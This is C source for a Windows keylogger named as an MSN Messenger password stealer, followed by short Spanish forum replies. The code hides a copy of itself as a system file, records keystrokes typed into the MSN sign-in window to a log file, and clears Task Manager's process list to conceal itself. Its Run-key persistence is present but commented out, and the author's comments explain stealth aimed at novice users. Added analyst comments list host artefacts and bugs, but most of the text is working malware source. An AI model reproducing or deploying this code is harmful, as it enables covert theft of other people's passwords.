#include <stdlib.h>
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <Winuser.h>
#include <string.h>
// all includes should be standard in dev
/*
Name: KOrUPt(not tellin)
Author: KOrUPt
Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
Date Written: 01/10/06 - 04/10/06
Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvments you make, thanks.
*/
/*
 * keys - append a text token for one virtual-key code to a log file.
 *
 * key:  virtual-key code to record; WinMain in this file passes the values
 *       produced by its GetAsyncKeyState scan loop.
 * file: path of the log file. It is opened in append mode, written and closed
 *       again on every call, so each recorded key is a separate
 *       open/append/close sequence on that path.
 *
 * The tests below are independent ifs, not an else-chain, so one code can emit
 * more than one token: 13 is VK_RETURN ("\n" followed by "[ENTER]\n\n"),
 * 32 is VK_SPACE (" " followed by "[SPACE]"), 110 is VK_DECIMAL ("[.]"
 * followed by "."), and VK_NUMLOCK is tested twice.
 *
 * Analyst note: the bracketed tokens are plain string literals, so they appear
 * both in the log file and in the compiled binary (the author's own comment
 * on the signature remarks on this).
 *
 * NOTE(review): the result of fopen is never checked, so a failed open passes
 * a null stream to every fprintf and to fclose.
 */
void keys(int key,char *file) // if you try and view the exe in notepad it discloses
{ // quite alot of source code(not good), so i may change the key output to codes instead
FILE *key_file;
key_file = fopen(file,"a+");
Sleep(10);
// 8 is VK_BACK (Backspace); it is recorded as "[del]".
if (key==8)
fprintf(key_file,"%s","[del]");
if (key==13)
fprintf(key_file,"%s","\n");
if (key==32)
fprintf(key_file,"%s"," ");
if (key==VK_CAPITAL)
fprintf(key_file,"%s","[Caps L]");
if (key==VK_TAB)
fprintf(key_file,"%s","[TAB]");
if (key ==VK_CONTROL)
fprintf(key_file,"%s","[CTRL]");
if (key ==VK_PAUSE)
fprintf(key_file,"%s","[PAUSE]");
if (key ==VK_ESCAPE)
fprintf(key_file,"%s","[ESC]");
if (key ==VK_END)
fprintf(key_file,"%s","[END]");
if (key==VK_HOME)
fprintf(key_file,"%s","[HOME]");
if (key ==VK_LEFT)
fprintf(key_file,"%s","[LEFT]");
if (key ==VK_UP)
fprintf(key_file,"%s","[UP]");
if (key ==VK_RIGHT)
fprintf(key_file,"%s","[RIGHT]");
if (key ==VK_DOWN)
fprintf(key_file,"%s","[DOWN]");
if (key ==VK_SNAPSHOT)
fprintf(key_file,"%s","[PRINT]");
if (key ==VK_NUMLOCK)
fprintf(key_file,"%s","[NUM LOCK]");
if (key ==VK_RETURN)
fprintf(key_file,"%s","[ENTER]\n\n");
if (key ==VK_SHIFT)
fprintf(key_file,"%s","[SHIFT]");
if (key ==VK_SPACE)
fprintf(key_file,"%s","[SPACE]");
if (key ==VK_LBUTTON)
fprintf(key_file,"%s","[LM B]");
if (key ==VK_RBUTTON)
fprintf(key_file,"%s","[RM B]");
if (key ==VK_MENU)
fprintf(key_file,"%s","[ALT]");
if (key ==VK_LWIN)
fprintf(key_file,"%s","[Windows key]");
if (key ==VK_ADD)
fprintf(key_file,"%s","[+]");
if (key ==VK_SUBTRACT)
fprintf(key_file,"%s","[-]");
if (key ==VK_DECIMAL)
fprintf(key_file,"%s","[.]");
if (key ==VK_DIVIDE)
fprintf(key_file,"%s","[DIVIDE KEY]");
if (key ==VK_NUMPAD0)
fprintf(key_file,"%s","[NUMPAD 0]");
if (key ==VK_NUMPAD1)
fprintf(key_file,"%s","[NUMPAD 1]");
if (key ==VK_NUMPAD2)
fprintf(key_file,"%s","[NUMPAD 2]");
if (key ==VK_NUMPAD3)
fprintf(key_file,"%s","[NUMPAD 3]");
if (key ==VK_NUMPAD4)
fprintf(key_file,"%s","[NUMPAD 4]");
if (key ==VK_NUMPAD5)
fprintf(key_file,"%s","[NUMPAD 5]");
if (key ==VK_NUMPAD6)
fprintf(key_file,"%s","[NUMPAD 6]");
if (key ==VK_NUMPAD7)
fprintf(key_file,"%s","[NUMPAD 7]");
if (key ==VK_NUMPAD8)
fprintf(key_file,"%s","[NUMPAD 8]");
if (key ==VK_NUMPAD9)
fprintf(key_file,"%s","[NUMPAD 9]");
if (key ==VK_F1)
fprintf(key_file,"%s","[F1 KEY]");
if (key ==VK_F2)
fprintf(key_file,"%s","[F2 KEY]");
if (key ==VK_F3)
fprintf(key_file,"%s","[F3 KEY]");
if (key ==VK_F4)
fprintf(key_file,"%s","[F4 KEY]");
if (key ==VK_F5)
fprintf(key_file,"%s","[F5 KEY]");
if (key ==VK_F6)
fprintf(key_file,"%s","[F6 KEY]");
if (key ==VK_F7)
fprintf(key_file,"%s","[F7 KEY]");
if (key ==VK_F8)
fprintf(key_file,"%s","[F8 KEY]");
if (key ==VK_F9)
fprintf(key_file,"%s","[F9 KEY]");
if (key ==VK_F10)
fprintf(key_file,"%s","[F10 KEY]");
if (key ==VK_F11)
fprintf(key_file,"%s","[F11 KEY]");
if (key ==VK_F12)
fprintf(key_file,"%s","[F12 KEY]");
if (key ==VK_NUMLOCK)
fprintf(key_file,"%s","[NUMLOCK KEY]");
if (key ==VK_SCROLL)
fprintf(key_file,"%s","[SCROLL LOCK]");
/* // WONT WORK ON WIN 9X
if (key ==VK_OEM_PLUS)
fprintf(key_file,"%s","[+]");
if (key ==VK_OEM_COMMA)
fprintf(key_file,"%s","[,]");
if (key ==VK_OEM_MINUS)
fprintf(key_file,"%s","[-]");
if (key ==VK_OEM_PERIOD)
fprintf(key_file,"%s","[.]");
*/
// 190 is VK_OEM_PERIOD and 110 is VK_DECIMAL; both are written as a literal ".".
if (key ==190 || key==110)
fprintf(key_file,"%s",".");
// 96..105 are VK_NUMPAD0..VK_NUMPAD9; subtracting 48 maps them to ASCII '0'..'9'.
// key is modified in place, so the 48..59 test that follows matches as well
// and the same digit is written a second time.
if (key >=96 && key <= 105){
key = key - 48;
// &key is an int* handed to %s. This prints a single character only because
// the low byte of the int is read first and the next byte is zero
// (little-endian layout); it is not a real C string.
fprintf(key_file,"%s",&key);
}
// 48..57 are the top-row digit keys, whose codes equal their ASCII characters.
// The range as written also accepts 58 and 59.
if (key >=48 && key <= 59)
fprintf(key_file,"%s",&key);
// This condition holds for every value of key (no value equals both
// constants), so it filters nothing.
if (key !=VK_LBUTTON || key !=VK_RBUTTON){
// 65..90 are the letter keys A..Z.
if (key >=65 && key <=90){
// A nonzero Caps Lock state writes the upper-case letter as-is; otherwise
// +32 converts it to lower case. The Shift state is not consulted here.
if (GetKeyState(VK_CAPITAL))
fprintf(key_file,"%s",&key);
else
{
key = key +32;
fprintf(key_file,"%s",&key);
}
}
}
fclose(key_file);
}
// File-scope state shared by the routines below.
char buffer[300] = ""; // receives the foreground window title in WinMain
HWND currentwin; // foreground window handle sampled in WinMain
DWORD pid; // filled by GetWindowThreadProcessId in WinMain; never read in this listing
unsigned char reg[2] = "1"; // not referenced anywhere in this listing
// NOTE(review): a function call in a file-scope initializer is not a constant
// expression in C, so this line presumably only builds with a C++ compiler - confirm.
HMODULE modH = GetModuleHandle(0); // module handle of the running executable itself
char dir[255]; // WinMain builds the "<system directory>\Sndserv.exe" path here
char dir2[MAX_PATH]; // WinMain stores the running executable's own path here
char dir3[MAX_PATH]; // hidden inside WinMain by a local array of the same name
char KeyLogPath[MAX_PATH]; // holds dir path for wordsv80.ini
// Functions
/*
 * block - window-enumeration callback that empties Task Manager's process list.
 *
 * hwnd:   window handed in by the enumeration (see HideProgram).
 * lParam: unused.
 * Returns FALSE (stop enumerating) after clearing a matching list view,
 * TRUE (keep going) otherwise.
 *
 * A window matches when its text contains "Processes" and its class name
 * contains "SysListView32". The match then receives LVM_DELETEALLITEMS, which
 * removes every row from that list view; the process is not hidden from the
 * system, only the display is blanked until the owner repopulates it.
 *
 * Analyst note: the observable is one process sending LVM_DELETEALLITEMS to a
 * list-view control owned by another process.
 */
BOOL CALLBACK block(HWND hwnd,LPARAM lParam) // used to hide from taskmgr
{
char classname[150] = "";
char windowtext[150] = "";
GetWindowText(hwnd,windowtext,149);
// NOTE(review): 249 is passed as the capacity of a 150-byte array, so a long
// class name can be written past the end of classname.
GetClassName(hwnd,classname,249);
if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{
SendMessage(hwnd,LVM_DELETEALLITEMS,0,0); // clears Taskmgr every x seconds
return FALSE;
}
return TRUE;
}
/*
 * HideProgram - endless loop that re-runs block() over Task Manager's child
 * windows with a 5 ms pause between passes.
 *
 * The target is located by the exact title "Windows Task Manager". When
 * FindWindow finds no such window it returns NULL, and EnumChildWindows with
 * a NULL parent enumerates top-level windows instead.
 *
 * The function never returns. Nothing in this listing calls it or starts it
 * as a thread; WinMain does not reference it.
 *
 * NOTE(review): the signature resembles a thread start routine but takes no
 * LPVOID parameter - presumably intended for CreateThread; confirm.
 */
DWORD WINAPI HideProgram() // also used to hide from taskmgr
{
for(;;)
{
Sleep(5);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0); // calls block function evrey 5 milee seconds
}
}
/*
 * WinMain - entry point: installs a copy of the executable, then records
 * keystrokes while a specific sign-in window is in the foreground.
 *
 * Behaviour visible in this function, in order:
 *   1. Builds the log path "<Windows directory>//wordsv80.ini".
 *   2. Copies the running executable to "<system directory>\Sndserv.exe",
 *      overwriting any existing file, and marks the copy hidden, read-only
 *      and system.
 *   3. Registry autostart code is present but commented out, so this build
 *      as shown writes no Run/RunOnce/RunServices values.
 *   4. Loops forever: polls the foreground window title and, while it contains
 *      the sign-in caption below, polls GetAsyncKeyState and passes newly
 *      pressed keys to keys().
 *
 * Host artefacts to look for (all taken from this listing): wordsv80.ini in
 * the Windows directory; Sndserv.exe in the system directory carrying the
 * hidden+system+read-only attributes; for variants with the commented block
 * enabled, HKLM ...\CurrentVersion\Run, RunOnce, RunServices and
 * RunServicesOnce values named "1x00387z", "95x00x8z", "87x409x" and "62x402b"
 * with data "Sndserv.exe".
 *
 * Returns 0 only through the four-key exit combination; otherwise never returns.
 */
int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
{
// NOTE(review): where char is signed, i cannot hold values up to 190, so the
// "i<=190" test in the scan loop below never becomes false - see the note there.
char i;
GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
strcat(KeyLogPath,"//wordsv80.ini"); // this is the file that keys are saved to
// Add to system folder
// dir2 <- full path of the running executable; dir <- system directory path.
GetModuleFileName(modH, dir2, 256);
GetSystemDirectory(dir,255);
strcat(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
CopyFile(dir2,dir,FALSE); // but dont know how to change the icon pic, lol, will learn how to soon though
// This local hides the file-scope dir3; it is used only by the commented-out
// registry code below.
unsigned char dir3[25] = "Sndserv.exe";
SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out
// Add to registry
// I think weird decimal vaules makes it less likly to be deleted because it
// hasnt got any spefic name, it could be somthing really importent, dont forget,
// most people are quite scared of editing there reigstry in case they ruin the whole pc,
// if they see something they dont understand, then the old phase "better save than sorry" springs to mind
// i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
// but im talkin about the N0oBs here, sorry noobs lol
// oh well back to the code
// The whole registry section that follows is inside a block comment and is not compiled.
/*
HKEY key1;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
RegCloseKey(key1);
HKEY key2;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
RegCloseKey(key2); // i dont fully know how this key will react on startup, should be alright lol
HKEY key3;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
RegCloseKey(key3);
HKEY key4;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
RegCloseKey(key4);
// was goin to disable regedit, but decided not to
// in case made the user suspicuos, i prefer the stealth method
*/
while(1)
{
Sleep(20); // to some save cpu
// Just in case we need an emergency exit
// Ctrl+Tab+F5+F8 reported together shows an empty message box and ends the process.
if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
{
MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
return 0;
}
// cannot close program while login box is present
// The label sits after the exit check and the Sleep, so a jump back here
// skips both.
jump:
currentwin = GetForegroundWindow();
GetWindowText(currentwin,(char*)buffer,300);
// Capture is gated on the foreground window title containing this exact caption.
if(strstr(buffer,"Sign in to .NET messenger Service- MSN Messenger")) // or anything else you want a password to lol
{
// pid is stored but not used again in this listing.
GetWindowThreadProcessId(currentwin,&pid);
// Polls each virtual-key code with GetAsyncKeyState and no pause between
// polls. With a signed char counter the loop condition stays true, so the
// scan only leaves through the goto below; expect sustained CPU use while
// the matching window stays in front and no key is pressed.
for(i=8;i<=190;i++) // activate keyloger
{
// -32767 is 0x8001 as a SHORT: the key is down and was pressed since the
// previous GetAsyncKeyState call for that key.
if (GetAsyncKeyState(i) == -32767)
{
keys (i,KeyLogPath); // loop through keys function and add keys pressed to file
goto jump; // to recheck if logon window is still active, if not continue searching untill found
}
}
}
}
}
¿Cuál es la función de esto? :o :o (¡Pusiste buenos códigos fuente! ¡Gracias!)
Stealer (en español "ladrón de información") es el nombre genérico de programas informáticos maliciosos del tipo troyano, que se introducen a través de internet en un ordenador con el propósito de obtener de forma fraudulenta información confidencial del propietario, tal como su nombre de acceso a sitios web, contraseña o número de tarjeta de crédito.
Infostealer puede afectar también al servicio de correo electrónico MSN Messenger, enviando mensajes falsos e incluso introduciendo en ellos datos incluidos por los usuarios en sus mensajes a través de dicho servicio.
WIKIPEDIA (http://wikipedia)
(http://www.deviantart.com/download/45597300/emoticon__silver_surfer_by_mini_may.gif) ;)